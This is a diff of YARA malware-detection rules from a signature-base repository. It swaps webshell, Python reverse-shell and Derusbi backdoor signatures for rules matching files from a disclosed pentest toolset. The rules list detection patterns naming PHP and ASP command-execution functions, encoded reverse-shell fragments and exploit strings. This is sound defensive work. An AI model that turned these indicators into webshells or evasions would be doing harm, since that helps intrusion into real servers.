-		filesize < 70KB and ( ( ( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) or ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) or ( $cjsp_short1 at 0 or any of ( $cjsp_long* ) or ( $cjsp_short1 and $cjsp_short2 in ( filesize -100 .. filesize ) ) or ( $cjsp_short2 and ( $cjsp_short1 in ( 0 .. 1000 ) or $cjsp_short1 in ( filesize -1000 .. filesize ) ) ) ) ) and ( filesize < 300KB and not uint16( 0 ) == 0x5a4d and ( all of ( $w* ) or all of ( $l* ) or 2 of ( $take_two* ) ) ) and not any of ( $fp* )
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_In_Image : FILE
+rule SIGNATURE_BASE_CN_Honker_Cncert_Ccdoor_CMD : FILE
 {
 	meta:
-		description = "Webshell in GIF, PNG or JPG"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "b1185b69-9b08-5925-823a-829fee6fa4cf"
-		date = "2021-02-27"
-		modified = "2024-03-11"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L6598-L6858"
+		description = "Sample from CN Honker Pentest Toolset - file CnCerT.CCdoor.CMD.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ddd328a8-7ad8-5b26-9deb-3e5da801cd1b"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L737-L754"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d4fde4e691db3e70a6320e78657480e563a9f87935af873a99db72d6a9a83c78"
-		hash = "84938133ee6e139a2816ab1afc1c83f27243c8ae76746ceb2e7f20649b5b16a4"
-		hash = "52b918a64afc55d28cd491de451bb89c57bce424f8696d6a94ec31fb99b17c11"
-		logic_hash = "e7e78107c661aa5124a37b8e492986e5a3da63c79c97c4dc3199e648a5aa4aa8"
-		score = 55
-		quality = -192
+		hash = "1c6ed7d817fa8e6534a5fd36a94f4fc2f066c9cd"
+		logic_hash = "3c068c3d21de8c071b3eec354f03423d4902ef0156bb9dcad370cf688bc03426"
+		score = 70
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
 
 	strings:
-		$png = { 89 50 4E 47 }
-		$jpg = { FF D8 FF E0 }
-		$gif = "GIF8" wide ascii
-		$gif2 = "gif89"
-		$gif3 = "Gif89"
-		$mdb = { 00 01 00 00 53 74 }
-		$php_short = "<?" wide ascii
-		$no_xml1 = "<?xml version" nocase wide ascii
-		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
-		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
-		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
-		$no_pdf = "<?xpacket"
-		$php_new1 = /<\?=[^?]/ wide ascii
-		$php_new2 = "<?php" nocase wide ascii
-		$php_new3 = "<script language=\"php" nocase wide ascii
-		$cpayload1 = /\beval[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload2 = /\bexec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload3 = /\bshell_exec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload4 = /\bpassthru[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload5 = /\bsystem[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload6 = /\bpopen[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload7 = /\bproc_open[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload8 = /\bpcntl_exec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload9 = /\bassert[\n\t ]{0,500}\([^)0]/ nocase wide ascii
-		$cpayload10 = /\bpreg_replace[\n\t ]{0,500}\([^\)]{1,100}\/[ismxADSUXju]{0,11}(e|\\x65)/ nocase wide ascii
-		$cpayload12 = /\bmb_ereg_replace[\t ]{0,500}\([^\)]{1,100}'e'/ nocase wide ascii
-		$cpayload13 = /\bmb_eregi_replace[\t ]{0,500}\([^\)]{1,100}'e'/ nocase wide ascii
-		$cpayload20 = /\bcreate_function[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload21 = /\bReflectionFunction[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload22 = /fetchall\(PDO::FETCH_FUNC[\n\t ]{0,500}[,}\)]/ nocase wide ascii
-		$m_cpayload_preg_filter1 = /\bpreg_filter[\n\t ]{0,500}(\([^\)]|\/\*)/ nocase wide ascii
-		$m_cpayload_preg_filter2 = "'|.*|e'" nocase wide ascii
-		$php_multi_write1 = "fopen(" wide ascii
-		$php_multi_write2 = "fwrite(" wide ascii
-		$php_write1 = "move_uploaded_file" fullword wide ascii
-		$cjsp1 = "<%" ascii wide
-		$cjsp2 = "<jsp:" ascii wide
-		$cjsp3 = /language=[\"']java[\"\']/ ascii wide
-		$cjsp4 = "/jstl/core" ascii wide
-		$payload1 = "ProcessBuilder" fullword ascii wide
-		$payload2 = "processCmd" fullword ascii wide
-		$rt_payload1 = "Runtime" fullword ascii wide
-		$rt_payload2 = "getRuntime" fullword ascii wide
-		$rt_payload3 = "exec" fullword ascii wide
-		$tagasp_short1 = /<%[^"]/ wide ascii
-		$tagasp_short2 = "%>" wide ascii
-		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
-		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
-		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
-		$tagasp_long10 = "<%@ " wide ascii
-		$tagasp_long11 = /<% \w/ nocase wide ascii
-		$tagasp_long12 = "<%ex" nocase wide ascii
-		$tagasp_long13 = "<%ev" nocase wide ascii
-		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
-		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
-		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
-		$php1 = "<?php"
-		$php2 = "<?="
-		$jsp1 = "=\"java." wide ascii
-		$jsp2 = "=\"javax." wide ascii
-		$jsp3 = "java.lang." wide ascii
-		$jsp4 = "public" fullword wide ascii
-		$jsp5 = "throws" fullword wide ascii
-		$jsp6 = "getValue" fullword wide ascii
-		$jsp7 = "getBytes" fullword wide ascii
-		$perl1 = "PerlScript" fullword
-		$asp_payload0 = "eval_r" fullword nocase wide ascii
-		$asp_payload1 = /\beval\s/ nocase wide ascii
-		$asp_payload2 = /\beval\(/ nocase wide ascii
-		$asp_payload3 = /\beval\"\"/ nocase wide ascii
-		$asp_payload4 = /:\s{0,10}eval\b/ nocase wide ascii
-		$asp_payload8 = /\bexecute\s?\(/ nocase wide ascii
-		$asp_payload9 = /\bexecute\s[\w"]/ nocase wide ascii
-		$asp_payload11 = "WSCRIPT.SHELL" fullword nocase wide ascii
-		$asp_payload13 = "ExecuteGlobal" fullword nocase wide ascii
-		$asp_payload14 = "ExecuteStatement" fullword nocase wide ascii
-		$asp_payload15 = "ExecuteStatement" fullword nocase wide ascii
-		$asp_multi_payload_one1 = "CreateObject" nocase fullword wide ascii
-		$asp_multi_payload_one2 = "addcode" fullword wide ascii
-		$asp_multi_payload_one3 = /\.run\b/ wide ascii
-		$asp_multi_payload_two1 = "CreateInstanceFromVirtualPath" fullword wide ascii
-		$asp_multi_payload_two2 = "ProcessRequest" fullword wide ascii
-		$asp_multi_payload_two3 = "BuildManager" fullword wide ascii
-		$asp_multi_payload_three1 = "System.Diagnostics" wide ascii
-		$asp_multi_payload_three2 = "Process" fullword wide ascii
-		$asp_multi_payload_three3 = ".Start" wide ascii
-		$asp_multi_payload_four1 = "CreateObject" fullword nocase wide ascii
-		$asp_multi_payload_four2 = "TransformNode" fullword nocase wide ascii
-		$asp_multi_payload_four3 = "loadxml" fullword nocase wide ascii
-		$asp_multi_payload_five1 = "ProcessStartInfo" fullword nocase wide ascii
-		$asp_multi_payload_five2 = ".Start" nocase wide ascii
-		$asp_multi_payload_five3 = ".Filename" nocase wide ascii
-		$asp_multi_payload_five4 = ".Arguments" nocase wide ascii
-		$asp_always_write1 = /\.write/ nocase wide ascii
-		$asp_always_write2 = /\.swrite/ nocase wide ascii
-		$asp_write_way_one2 = "SaveToFile" fullword nocase wide ascii
-		$asp_write_way_one3 = "CREAtEtExtFiLE" fullword nocase wide ascii
-		$asp_cr_write1 = "CreateObject(" nocase wide ascii
-		$asp_cr_write2 = "CreateObject (" nocase wide ascii
-		$asp_streamwriter1 = "streamwriter" fullword nocase wide ascii
-		$asp_streamwriter2 = "filestream" fullword nocase wide ascii
+		$s2 = "CnCerT.CCdoor.CMD.dll" fullword wide
+		$s3 = "cmdpath" fullword ascii
+		$s4 = "Get4Bytes" fullword ascii
+		$s5 = "ExcuteCmd" fullword ascii
 
 	condition:
-		filesize < 5MB and ( $png at 0 or $jpg at 0 or $gif at 0 or $gif at 3 or $gif2 at 0 or $gif2 at 3 or $gif3 at 0 or $mdb at 0 ) and ( ( ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and ( ( any of ( $cpayload* ) or all of ( $m_cpayload_preg_filter* ) ) or ( any of ( $php_write* ) or all of ( $php_multi_write* ) ) ) ) or ( ( any of ( $cjsp* ) ) and ( 1 of ( $payload* ) or all of ( $rt_payload* ) ) ) or ( ( ( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and ( ( any of ( $asp_payload* ) or all of ( $asp_multi_payload_one* ) or all of ( $asp_multi_payload_two* ) or all of ( $asp_multi_payload_three* ) or all of ( $asp_multi_payload_four* ) or all of ( $asp_multi_payload_five* ) ) or ( any of ( $asp_always_write* ) and ( any of ( $asp_write_way_one* ) and any of ( $asp_cr_write* ) ) or ( any of ( $asp_streamwriter* ) ) ) ) ) )
+		uint16( 0 ) == 0x5a4d and filesize < 22KB and all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_Mixed_OBFUSC : FILE
+rule SIGNATURE_BASE_CN_Honker_Termsrvhack : FILE
 {
 	meta:
-		description = "Detects webshell with mixed obfuscation commands"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "dcb4054b-0c87-5cd0-9297-7fd5f2e37437"
-		date = "2023-01-28"
-		modified = "2023-04-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L6860-L6884"
+		description = "Sample from CN Honker Pentest Toolset - file termsrvhack.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4fd582a1-3c6d-57a1-bba0-f775bb61ef00"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L756-L771"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "76cc6390cbdb81055c72edb124db2bf52e3d0b975406367a9c49a0ee6621d30b"
-		score = 50
+		hash = "1c456520a7b7faf71900c71167038185f5a7d312"
+		logic_hash = "ef0b9965e2d419230a7a8425674edb356347d1e41538d19fc67f8b0fbc69091f"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "8c4e5c6bdfcc86fa27bdfb075a7c9a769423ec6d53b73c80cbc71a6f8dd5aace"
-		hash2 = "78f2086b6308315f5f0795aeaa75544128f14889a794205f5fc97d7ca639335b"
-		hash3 = "3bca764d44074820618e1c831449168f220121698a7c82e9909f8eab2e297cbd"
-		hash4 = "b26b5e5cba45482f486ff7c75b54c90b7d1957fd8e272ddb4b2488ec65a2936e"
-		hash5 = "e217be2c533bfddbbdb6dc6a628e0d8756a217c3ddc083894e07fd3a7408756c"
-		importance = 70
 
 	strings:
-		$s1 = "rawurldecode/*" ascii
-		$s2 = "preg_replace/*" ascii
-		$s3 = " __FILE__/*" ascii
-		$s4 = "strlen/*" ascii
-		$s5 = "str_repeat/*" ascii
-		$s6 = "basename/*" ascii
+		$s1 = "The terminal server cannot issue a client license.  It was unable to issue the" wide
+		$s6 = "%s\\%s\\%d\\%d" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x3f3c and filesize < 200KB and ( 4 of them ) )
+		uint16( 0 ) == 0x5a4d and filesize < 1052KB and all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_Cookie_Post_Obfuscation : FILE
+rule SIGNATURE_BASE_CN_Honker_IIS6_Iis6 : FILE
 {
 	meta:
-		description = "Detects webshell using cookie POST"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "cc5ded80-5e58-5b25-86d1-1c492042c740"
-		date = "2023-01-28"
-		modified = "2023-04-05"
-		reference = "https://github.com/SigmaHQ/Detection-Rule-License/blob/main/LICENSE.Detection.Rules.md"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L6886-L6912"
+		description = "Sample from CN Honker Pentest Toolset - file iis6.com"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f5d49cbd-1aec-5126-ab5d-83e485fa6869"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L773-L790"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d08a00e56feb78b7f6599bad6b9b1d8626ce9a6ea1dfdc038358f4c74e6f65c9"
-		hash = "2ce5c4d31682a5a59b665905a6f698c280451117e4aa3aee11523472688edb31"
-		hash = "ff732d91a93dfd1612aed24bbb4d13edb0ab224d874f622943aaeeed4356c662"
-		hash = "a3b64e9e065602d2863fcab641c75f5d8ec67c8632db0f78ca33ded0f4cea257"
-		hash = "d41abce305b0dc9bd3a9feb0b6b35e8e39db9e75efb055d0b1205a9f0c89128e"
-		hash = "333560bdc876fb0186fae97a58c27dd68123be875d510f46098fc5a61615f124"
-		hash = "2efdb79cdde9396ff3dd567db8876607577718db692adf641f595626ef64d3a4"
-		hash = "e1bd3be0cf525a0d61bf8c18e3ffaf3330c1c27c861aede486fd0f1b6930f69a"
-		hash = "f8cdedd21b2cc29497896ec5b6e5863cd67cc1a798d929fd32cdbb654a69168a"
-		logic_hash = "87229859ca3ee8f8b79360603c421528cda2ecefcc46d4080236d09b2dd510fb"
-		score = 75
+		hash = "f0c9106d6d2eea686fd96622986b641968d0b864"
+		logic_hash = "51b2fdae6437d64661f20342711d516201740eceb2273704a6e415be2cac54f6"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		importance = 70
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "]($_COOKIE, $_POST) as $"
-		$s2 = "function"
-		$s3 = "Array"
+		$s0 = "GetMod;ul" fullword ascii
+		$s1 = "excjpb" fullword ascii
+		$s2 = "LEAUT1" fullword ascii
+		$s3 = "EnumProcessModules" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x3f3c and filesize < 100KB and ( all of them ) )
+		uint16( 0 ) == 0x5a4d and filesize < 50KB and all of them
 }
-rule SIGNATURE_BASE_Gen_Python_Reverse_Shell : FILE
+rule SIGNATURE_BASE_CN_Honker_Struts2_Catbox : FILE
 {
 	meta:
-		description = "Python Base64 encoded reverse shell"
-		author = "John Lambert @JohnLaTwC"
-		id = "dda831ae-d0ca-5d5a-bdb3-e7c146a770b4"
-		date = "2018-02-24"
+		description = "Sample from CN Honker Pentest Toolset - file catbox.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "24df7a11-5ec4-5e7b-86f6-6195ca01b8f9"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.virustotal.com/en/file/9ec5102bcbabc45f2aa7775464f33019cfbe9d766b1332ee675957c923a17efd/analysis/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_python_reverse_shell.yara#L1-L36"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L792-L807"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "12b1424265cd0ea62b8dd5c08933f1285a156d906df6c31ca9a94fbc303f248e"
-		score = 75
-		quality = 58
+		hash = "ee8fbd91477e056aef34fce3ade474cafa1a4304"
+		logic_hash = "20bda5c918ea38810603528a20f3406ec4e79ce999681649e8e806bf549b5359"
+		score = 70
+		quality = 85
 		tags = "FILE"
-		hash1 = "9ec5102bcbabc45f2aa7775464f33019cfbe9d766b1332ee675957c923a17efd"
-		hash2 = "bfb5c622a3352bb71b86df81c45ccefaa68b9f7cc0a3577e8013aad951308f12"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$h1 = "import base64" fullword ascii
-		$s1 = "b64decode" fullword ascii
-		$s2 = "lambda" fullword ascii
-		$s3 = "version_info" fullword ascii
-		$enc_x0 = /(AG8AYwBrAGUAdAAuAFMATwBDAEsAXwBTAFQAUgBFAEEATQ|b2NrZXQuU09DS19TVFJFQU|c29ja2V0LlNPQ0tfU1RSRUFN|cwBvAGMAawBlAHQALgBTAE8AQwBLAF8AUwBUAFIARQBBAE0A|MAbwBjAGsAZQB0AC4AUwBPAEMASwBfAFMAVABSAEUAQQBNA|NvY2tldC5TT0NLX1NUUkVBT)/ ascii
-		$enc_x1 = /(4AYwBvAG4AbgBlAGMAdAAoACgA|5jb25uZWN0KC|AGMAbwBuAG4AZQBjAHQAKAAoA|LgBjAG8AbgBuAGUAYwB0ACgAKA|LmNvbm5lY3QoK|Y29ubmVjdCgo)/
-		$enc_x2 = /(AGkAbQBlAC4AcwBsAGUAZQBwA|aW1lLnNsZWVw|dABpAG0AZQAuAHMAbABlAGUAcA|dGltZS5zbGVlc|QAaQBtAGUALgBzAGwAZQBlAHAA|RpbWUuc2xlZX)/
-		$enc_x3 = /(4AcgBlAGMAdg|5yZWN2|AHIAZQBjAHYA|cmVjd|LgByAGUAYwB2A|LnJlY3)/
+		$s6 = "'Toolmao box by gainover www.toolmao.com" fullword ascii
+		$s20 = "{external.exeScript(_toolmao_bgscript[i],'javascript',false);}}" fullword ascii
 
 	condition:
-		uint32be( 0 ) == 0x696d706f and $h1 at 0 and filesize < 40KB and all of ( $s* ) and all of ( $enc_x* )
+		uint16( 0 ) == 0x5a4d and filesize < 8160KB and all of them
 }
-rule SIGNATURE_BASE_Apt_Nix_Elf_Derusbi_1 : FILE
+rule SIGNATURE_BASE_CN_Honker_Getlsasrvaddr : FILE
 {
 	meta:
-		description = "Detects Derusbi Backdoor ELF"
-		author = "Fidelis Cybersecurity"
-		id = "c825c5d6-1c2f-5ee7-871e-4be3f41d73f7"
-		date = "2016-02-29"
-		modified = "2023-05-04"
-		reference = "https://github.com/fideliscyber/indicators/tree/master/FTA-1021"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turbo_campaign.yar#L1-L49"
+		description = "Sample from CN Honker Pentest Toolset - file getlsasrvaddr.exe - WCE Amplia Security"
+		author = "Florian Roth (Nextron Systems)"
+		id = "fa0c0376-c5c3-5b48-b03e-86cefb547479"
+		date = "2015-06-23"
+		modified = "2022-12-21"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L809-L826"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "61ef65a1500d3def3376a82bc376db451d202d18b03855ee279b6c01757deb2a"
-		score = 75
-		quality = 83
+		hash = "a897d5da98dae8d80f3c0a0ef6a07c4b42fb89ce"
+		logic_hash = "e626724430d0b74aee52783dd5abdb8ccc7b951c56041e5c166b78b7370bc402"
+		score = 70
+		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "LxMain"
-		$s2 = "execve"
-		$s3 = "kill"
-		$s4 = "cp -a %s %s"
-		$s5 = "%s &"
-		$s6 = "dbus-daemon"
-		$s7 = "--noprofile"
-		$s8 = "--norc"
-		$s9 = "TERM=vt100"
-		$s10 = "/proc/%u/cmdline"
-		$s11 = "loadso"
-		$s12 = "/proc/self/exe"
-		$s13 = "Proxy-Connection: Keep-Alive"
-		$s14 = "Connection: Keep-Alive"
-		$s15 = "CONNECT %s"
-		$s16 = "HOST: %s:%d"
-		$s17 = "User-Agent: Mozilla/4.0"
-		$s18 = "Proxy-Authorization: Basic %s"
-		$s19 = "Server: Apache"
-		$s20 = "Proxy-Authenticate"
-		$s21 = "gettimeofday"
-		$s22 = "pthread_create"
-		$s23 = "pthread_join"
-		$s24 = "pthread_mutex_init"
-		$s25 = "pthread_mutex_destroy"
-		$s26 = "pthread_mutex_lock"
-		$s27 = "getsockopt"
-		$s28 = "socket"
-		$s29 = "setsockopt"
-		$s30 = "select"
-		$s31 = "bind"
-		$s32 = "shutdown"
-		$s33 = "listen"
-		$s34 = "opendir"
-		$s35 = "readdir"
-		$s36 = "closedir"
-		$s37 = "rename"
+		$s8 = "pingme.txt" fullword ascii
+		$s16 = ".\\lsasrv.pdb" ascii
+		$s20 = "Addresses Found: " fullword ascii
 
 	condition:
-		uint32( 0 ) == 0x464c457f and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
 }
-rule SIGNATURE_BASE_Apt_Nix_Elf_Derusbi_Kernelmodule_1 : FILE
+rule SIGNATURE_BASE_CN_Honker_Ms10048_X64 : FILE
 {
 	meta:
-		description = "Detects Derusbi Backdoor ELF Kernel Module"
-		author = "Fidelis Cybersecurity"
-		id = "98196ffc-8a6f-5edc-a688-eeb449410b72"
-		date = "2016-02-29"
-		modified = "2023-05-04"
-		reference = "https://github.com/fideliscyber/indicators/tree/master/FTA-1021"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turbo_campaign.yar#L51-L83"
+		description = "Sample from CN Honker Pentest Toolset - file ms10048-x64.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b65b0bad-d74c-5e7a-a613-69ef80585c23"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L828-L843"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "fab37e2dbe05c694da6e428aa922747b276c2827cbbd2b6c8002f0cc30c2870c"
-		score = 75
+		hash = "418bec3493c85e3490e400ecaff5a7760c17a0d0"
+		logic_hash = "49addce6bef7588bf7683836a54bec6a2a646ecc3f7547083174d2255454cdf0"
+		score = 70
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "__this_module"
-		$s2 = "init_module"
-		$s3 = "unhide_pid"
-		$s4 = "is_hidden_pid"
-		$s5 = "clear_hidden_pid"
-		$s6 = "hide_pid"
-		$s7 = "license"
-		$s8 = "description"
-		$s9 = "srcversion="
-		$s10 = "depends="
-		$s12 = "vermagic="
-		$s13 = "current_task"
-		$s14 = "sock_release"
-		$s15 = "module_layout"
-		$s16 = "init_uts_ns"
-		$s17 = "init_net"
-		$s18 = "init_task"
-		$s19 = "filp_open"
-		$s20 = "__netlink_kernel_create"
-		$s21 = "kfree_skb"
+		$s1 = "[ ] Creating evil window" fullword ascii
+		$s2 = "[+] Set to %d exploit half succeeded" fullword ascii
 
 	condition:
-		uint32( 0 ) == 0x464c457f and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 125KB and all of them
 }
-rule SIGNATURE_BASE_Apt_Nix_Elf_Derusbi_Linux_Sharedmemcreation_1 : FILE
+rule SIGNATURE_BASE_CN_Honker_Logcleaner : FILE
 {
 	meta:
-		description = "Detects Derusbi Backdoor ELF Shared Memory Creation"
-		author = "Fidelis Cybersecurity"
-		id = "068b7bea-853d-57e8-a9fe-8b451dbc7582"
-		date = "2016-02-29"
-		modified = "2023-12-05"
-		reference = "https://github.com/fideliscyber/indicators/tree/master/FTA-1021"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turbo_campaign.yar#L85-L96"
+		description = "Sample from CN Honker Pentest Toolset - file LogCleaner.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "63ec5e47-9f3e-547a-bbff-cac8b27ac8f7"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L845-L860"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "adbdccea9ea7aefcca18d659c027a49e7e2e053873b77ddaf369203b3e301033"
-		score = 75
-		quality = 85
+		hash = "ab77ed5804b0394d58717c5f844d9c0da5a9f03e"
+		logic_hash = "3be059627c39e262e7621fce637df21ddcabef91753192cec356f2f8cd58c1a3"
+		score = 70
+		quality = 83
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$byte1 = { B6 03 00 00 ?? 40 00 00 00 ?? 0D 5F 01 82 }
+		$s3 = ".exe <ip> [(path]" fullword ascii
+		$s4 = "LogCleaner v" ascii
 
 	condition:
-		uint32( 0 ) == 0x464C457F and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 250KB and all of them
 }
-rule SIGNATURE_BASE_Apt_Nix_Elf_Derusbi_Linux_Strings_1 : FILE
+rule SIGNATURE_BASE_CN_Honker_Shell_Brute_Tool : FILE
 {
 	meta:
-		description = "Detects Derusbi Backdoor ELF Strings"
-		author = "Fidelis Cybersecurity"
-		id = "06717cc9-678d-5912-a671-65605b9c9968"
-		date = "2016-02-29"
+		description = "Sample from CN Honker Pentest Toolset - file shell_brute_tool.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "80fd0c9f-0ed9-5308-ac72-65b9b3b47ed1"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://github.com/fideliscyber/indicators/tree/master/FTA-1021"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turbo_campaign.yar#L98-L128"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L862-L877"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b54b406a562247d4c3d4a9c4d1b7584bdcecfe5b6c76867c04770e016eeb8c9a"
-		score = 75
-		quality = 83
+		hash = "f6903a15453698c35dce841e4d09c542f9480f01"
+		logic_hash = "723fd18e59c0017b67a035ec7c685169c517d673c2bbc8fe93071b8dbd1e606a"
+		score = 70
+		quality = 85
 		tags = "FILE"
